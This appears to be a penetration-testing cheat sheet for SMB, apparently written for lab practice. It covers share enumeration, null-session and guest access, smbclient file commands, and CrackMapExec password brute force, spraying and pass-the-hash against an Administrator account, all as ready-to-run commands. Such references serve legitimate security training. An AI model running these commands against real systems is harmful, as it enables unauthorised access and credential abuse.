List Shares (Unauthenticated)
Several tools list SMB shares. The two commands below do it without credentials (a null session, covered further down), so they only return results when the server permits anonymous access.
smbmap
smbmap -H 10.129.14.128
smbclient
smbclient -N -L //10.129.14.128
List Shares (Authenticated)
The same tools accept credentials. An authenticated listing usually reveals more shares and, with smbmap, the permissions (READ, WRITE, NO ACCESS) the account holds on each one.
smbmap
smbmap -H 10.129.14.128 -u shelled -p '<password>'
smbclient
smbclient -L //10.129.14.128 -U shelled
Connect to Share
Once a share name is known, connect to it with smbclient. It prompts for the password and drops into an interactive `smb: \>` prompt.
smbclient
smbclient //10.129.14.128 -U shelled
SMB Commands
Here are a few commands to use when connected to a share using smbclient.
List files on share
ls
Go into a Folder
cd <folder>
Create a folder
mkdir <folder>
Download a file
get <file>
Upload a file
put <local_filename> <remote_filename>
Rename a file
rename <remote_filename> <new_remote_filename>
Local Commands
Inside the smbclient prompt, a line beginning with ! is passed to the local shell on the attacking machine rather than to the server. This is useful for inspecting a file you have just downloaded without leaving the session:
!<cmd>
Example
!cat creds.txt
Null Authentication
A `null session` is an SMB session set up with an empty username and an empty password. Servers that allow it (older Windows versions and loosely configured Samba) expose the IPC$ share, the share list and often RPC enumeration of users, groups and policies without any credentials. We can connect this way with the following tools:
smbclient
smbclient -N -L //{IP}
smbmap
smbmap -H {IP}
rpcclient
rpcclient -U "" -N {IP}
enum4linux
enum4linux -a {IP}
Guest Account
The SMB guest account is designed to provide public access to certain resources without requiring users to log in with individual credentials, for example read-only access to shared documents or media files. It is disabled by default on current Windows releases, but on Samba the setting `map to guest = bad user` maps any unknown username to guest, so an arbitrary username with an empty password can succeed as well.
smbclient
smbclient -L //{IP} -U guest
smbmap
smbmap -H {IP} -u guest -p ''
rpcclient
rpcclient -U "guest" -N {IP}
enum4linux
enum4linux -a {IP} -u 'guest' -p ''
Password Bruteforce
Brute force tries many passwords against one account with CrackMapExec (CME). Check the lockout policy first (crackmapexec smb {IP} --pass-pol with -u '' -p '' for a null session, or with any valid credentials) and keep the attempts per account below the threshold inside the observation window; otherwise the account locks out and the attempt is both noisy and pointless. The --local-auth variant authenticates against the host's local SAM instead of the domain.
crackmapexec smb {IP} -u 'marie@shelled.io' -p /tmp/passwords.txt
crackmapexec smb {IP} -u 'marie@shelled.io' -p /tmp/passwords.txt --local-auth
Password Spray
Password spraying tries one password (or a few) against many accounts, which keeps every individual account under the lockout threshold. By default CME stops after the first successful login on a target; add --continue-on-success to keep walking the user list and find every account that shares the password.
crackmapexec smb {IP} -u /tmp/userlist.txt -p 'Company01!'
crackmapexec smb {IP} -u /tmp/userlist.txt -p 'Company01!' --local-auth
Pass the Hash
If we obtain a user's NTLM hash and cannot crack it, we can still authenticate over SMB with the hash itself, a technique called Pass-the-Hash (PtH). Windows does not store passwords in plaintext; the SAM, LSASS and the domain's NTDS.dit hold the NT hash, which is MD4 over the UTF-16LE encoding of the password with no salt. NTLM challenge-response authentication uses that hash directly as the key, so the server never needs the password, only proof that the client holds the hash.
In a Pass-the-Hash attack, an attacker obtains the NT hash of a valid user from a compromised system (SAM or LSASS dump, NTDS.dit, or a captured credential) and reuses it to authenticate to other systems without knowing the plaintext. Because the hash is unsalted, every account that uses the same password has the same hash, which is what makes reuse across hosts so effective. CME's -H accepts either the NT hash alone or the LM:NT pair as printed by secretsdump.
crackmapexec smb {IP} -u Administrator -H {HASH}